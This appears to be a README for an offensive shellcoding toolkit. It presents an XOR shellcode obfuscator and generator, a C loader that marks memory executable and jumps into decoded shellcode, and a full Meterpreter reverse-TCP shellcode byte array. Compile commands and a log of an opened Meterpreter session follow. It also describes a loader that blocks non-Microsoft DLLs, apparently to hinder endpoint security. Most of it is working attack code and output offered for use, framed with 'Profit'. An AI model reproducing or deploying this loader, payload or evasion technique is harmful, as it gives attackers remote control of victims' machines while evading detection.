Awesome
Shellcoding
Shellcoding Utilities and shellcode obfuscator generator.
Shellcode generator
Choose a key max size int32. Then generate the shellcode using generator.exe
. The final payload is created using generator.py
.
> generator.exe 1337 path_to_raw_shellcode_file
Encoded using the following key: 0x00000539 (1337)
\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
Generate the final payload to be compiled.
python3 generator.py 1337 \x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41
#include <windows.h>
int main() {
DWORD key = 0x539;
DWORD dwSize = 23;
DWORD dwProtection = 0;
CHAR *shellcode = GlobalAlloc(GPTR, dwSize);
VirtualProtect(shellcode, dwSize, PAGE_EXECUTE_READWRITE, &dwProtection);
strcpy(shellcode, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41");
DWORD *current;
int i = 0;
for(i; i < dwSize / 4; i++) {
current = (DWORD*)shellcode;
*current = *current ^ key;
shellcode += 4;
}
shellcode -= dwSize;
asm ("mov %0, %%eax\n\t"
"push %%eax\n\t"
"ret"
:
: "r" (shellcode));
// We are probably never going to reach that point
GlobalFree(shellcode);
return 0;
}
Finally, compile the output file using GCC and you are good to go.
WARNING
The way that the code is designed will prevent self modifying shellcode to work properly. Since the shellcode is part of the .text section which is by default READ/EXEC shellcode that perform write action will crash. I'm planning on releasing a writable wrapper soon.
Example:
Standard meterpreter shellcode
#include <Windows.h>
int main() {
asm("call code\n\t"
".byte 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xc5,0x84,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5\n\t"
"code:\n\t"
"ret\n\t");
return 0;
}
Compile it
mingw32-gcc.exe -c meterpreter.c -o meterpreter.o
mingw32-g++.exe -o meterpreter.exe meterpreter.o
Profit
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:8080
[*] Sending stage (179779 bytes) to 192.168.197.1
[*] Meterpreter session 3 opened (192.168.197.132:8080 -> 192.168.197.1:50634) at 2019-05-11 10:54:26 -0400
meterpreter > sysinfo
Computer : WTL-SP-4XXHWT2
OS : Windows 10 (Build 17763).
Architecture : x64
System Language : en_US
Domain : RingZer0
Logged On Users : 7
Meterpreter : x86/windows
meterpreter >
loader.c
A simple shellcode loader in C. This shellcode loader is not storing the shellcode in the data section. It store it directly in the text section to new to do shady memory allocation to call your shellcode.
The ASM syntax is for GCC compiler it can be adapted for VC too
raw2hex.py
Convert raw shellcode into something else
raw2hex.py rawshellcodefile -list
0x90, 0x90
raw2hex.py rawshellcodefile
\x90\x90
makefile.py
Generate the final C code
makefile.py shellcode.raw output.c
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON.c
C code to execute your payload and avoiding any NON MICROSOFT DLLs from been loaded.
Credit
Mr.Un1k0d3r RingZer0 Team